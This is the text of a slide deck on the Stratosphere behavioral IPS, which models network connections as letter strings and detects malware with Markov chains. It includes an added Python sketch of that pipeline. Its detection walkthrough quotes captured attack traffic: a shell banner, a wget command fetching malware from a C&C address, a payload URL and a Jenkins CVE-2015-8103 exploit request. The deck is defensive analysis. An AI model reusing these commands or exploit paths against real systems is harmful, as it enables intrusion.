Machine Learning, Security and the Stratosphere Project
Sebastian Garcia - CTU University, Prague
@eldracote
sebastian.garcia@agents.fel.cvut.cz
https://stratosphereips.org
Stratosphere IPS
https://stratosphereips.org/
Free Software
Machine Learning
Behavioral IPS
Protecting NGOs
Stratosphere Goals
To put machine learning techniques in the hands of the civil society.
To offer this detection service to NGOs for free.
To focus on what computers are doing, not the attacks they receive.
Stratosphere Tech Principles
Less is More: analyze the behavior of groups of flows.
Disassociate: representation of behavior from detection.
Verify: with real and labeled datasets.
About Behaviors
Your behavior is usually the same when connecting with the same service.
Group flows going to a specific service by ignoring the source port. We call it a connection.
The connection, composed of several flows, now shows a behavior in time.
Network Behaviors
Model network behaviors as a string of letters.
1 flow, 3 features, 1 letter.
Malware Behaviors
Malware mostly generates the same behaviors.
Changing the behavior is costly for the attacker.
These behaviors do not expire quickly.
Malware Open Data
https://stratosphereips.org/category/dataset.html
Behavior of Connections
Markov Chains Models
Create, train and store Markov Chain models.
Behavioral Detection
Trained Markov Models
Similarity to Unknown Traffic
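The pipeline the previous slides describe (group flows into a connection ignoring the source port, turn each flow's three features into one letter, train a Markov chain on the letter string and score unknown traffic against it), as an added Python example that is not Stratosphere's own code; the flows, bucket thresholds and letter alphabet are simplified assumptions.

```python
import math
from collections import defaultdict

# Constructed flows: (src, dst, dport, proto, sport, start_s, duration_s, bytes)
FLOWS = [
    ("10.0.0.5", "203.0.113.9", 25000, "tcp", 40001, 0, 2.0, 6000),
    ("10.0.0.5", "203.0.113.9", 25000, "tcp", 40002, 10, 2.1, 6100),
    ("10.0.0.5", "203.0.113.9", 25000, "tcp", 40003, 20, 1.9, 5900),
    ("10.0.0.5", "203.0.113.9", 25000, "tcp", 40004, 30, 2.0, 6050),
    ("10.0.0.5", "198.51.100.7", 443, "tcp", 40005, 3, 0.2, 900),
]

def group_connections(flows):
    """A connection is (src, dst, dport, proto); the source port is ignored."""
    conns = defaultdict(list)
    for f in flows:
        conns[f[:4]].append(f)
    return {k: sorted(v, key=lambda f: f[5]) for k, v in conns.items()}

def bin3(x, lo, hi):
    return 0 if x < lo else (1 if x < hi else 2)  # small/medium/large bucket

def to_letters(conn_flows):
    """One letter per flow from size, duration and periodicity. The alphabet is a
    simplified assumption: size and duration pick a..i, uppercase marks periodicity."""
    out, prev_gap = [], None
    for i, f in enumerate(conn_flows):
        ch = "abcdefghi"[bin3(f[7], 1000, 5000) * 3 + bin3(f[6], 0.5, 5.0)]
        gap = f[5] - conn_flows[i - 1][5] if i else None
        # periodic: the gap since the last flow is within 20% of the previous gap
        if prev_gap and gap and abs(gap - prev_gap) <= 0.2 * prev_gap:
            ch = ch.upper()
        prev_gap = gap
        out.append(ch)
    return "".join(out)

def train_markov(letters):
    """First-order Markov chain: P(next letter | current letter)."""
    counts = defaultdict(lambda: defaultdict(int))
    for a, b in zip(letters, letters[1:]):
        counts[a][b] += 1
    return {a: {b: c / sum(nb.values()) for b, c in nb.items()} for a, nb in counts.items()}

def similarity(model, letters, floor=1e-6):
    """Mean log-probability per transition (higher = closer to the model); unseen
    transitions get a small floor instead of zero so one new letter does not veto."""
    pairs = list(zip(letters, letters[1:]))
    if not pairs:
        return float("-inf")
    return sum(math.log(model.get(a, {}).get(b, floor)) for a, b in pairs) / len(pairs)
```

Representation (to_letters) and detection (train_markov, similarity) stay separate, so the NGO can ship only the letter strings and the model can still be retrained or swapped without touching the flows.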
Real Detection Example
Example Detection
January 18th, 2016.
Got an alert about a malicious behavior.
147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,
"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."
The Detected Connection
Sent: "+.............P.43.249.81.135.......?."
Recv once: "import time as O000OO0O0O00OO00O"
43.249.81.135
No VirusTotal detection.
AS58879 Shanghai Anchang Network Security Technology Co.,L. China.
Last known domain: lyzqmir2.com. Minecraft server.
The Beginning
103.242.134.118 port 33333/TCP [VT:7]
S:"/bin/sh: 0: can't access tty; job control turned off.$,"
S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$"
S:"wget 23.247.5.27:435/abcc.c"
23.247.5.27 port 25000/TCP (main CC)
"=...-== Love AV ==-:..Linux 3.2.0-4-amd64"
Python Script (Deobfuscated by Veronica Valeros Thx!)
"http://222.179.116.23:8080/theme/1/pys.py"
Is it Attacking?
Hundreds of connections to IPs in China, port 80/UDP.
115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]
A few KB of binary data sent.
No apparent explanation.
The Attack Conclusion
Strange POSTs to Jenkins minutes before:
POST /jenkins/descriptor/hudson.model.DownloadService/...
Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.
C&C channel with 10s timeouts.
Receives orders and executes OS commands.
Function to send random UDP data to IPs.
Similar to BillGates botnet, not quite.
Stratosphere Data Analysis
Cloud-based detection service for NGOs.
Add new algorithms continually.
Update the models.
Verify the detections if necessary.
We sign NDAs, NGOs can send the Flows or only the letters! Privacy matters.
New Algorithms
Anomaly Detection
New feature in behavioral letters.
Malicious HTTPs detection.
Graph Analysis of sequential connections.
WHOIS similarity grouping.
P2P behavior.
Behavioral Patterns of the Host.
Example of Graph Analysis
Organizations working with us
People In Need. CZ. Helping 22 countries. Human-rights, war, etc.
CZ.NIC. Manager of .cz and the Turris Project. 2,000 Internet Networks.
ICT help for policy makers in 20 African Countries
CTU University. With more than 7,000 hosts.
Questions? And Thanks!
Sebastian Garcia
eldraco@gmail.com
sebastian.garcia@agents.fel.cvut.cz
@eldracote